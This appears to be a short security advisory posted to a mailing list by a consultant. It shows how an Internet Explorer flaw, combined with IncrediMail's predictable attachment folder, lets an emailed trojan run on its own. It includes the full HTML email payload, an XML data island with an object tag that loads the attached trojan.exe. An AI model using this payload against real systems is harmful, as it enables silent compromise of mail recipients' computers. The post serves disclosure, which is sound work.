Hi, A Microsoft Internet Explorer vulnerability was found by GreyMagic (http://security.greymagic.com/adv/gm001-ie/). With IncrediMail, it's possible to gain a remote access on a computer. Incredimail save automatically email attachements in this directory (on Windows 2000 Professionnal) : C:\Program Files\IncrediMail\Data\Identities\{42D00B20-479C-11d4-9706-00105A40931C}\Message Store\Attachments So if you send an html email with the GreyMagic vulnerability and a trojan in attachments, it will be save in this directory. The html mail contains this code : <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:/Program Files/IncrediMail/Data/Identities/{42D00B20-479C-11d4-9706-00105A40931C}/Message Store/Attachments/trojan.exe"></object> ]]> </exploit> </security> </xml> So, the trojan is executed automatically. Eric DETOISIEN Consultant Sécurité GLOBAL SECURE Tel. : 01-44-70-48-02 Fax. : 01-44-70-48-49 Web : http://www.global-secure.fr
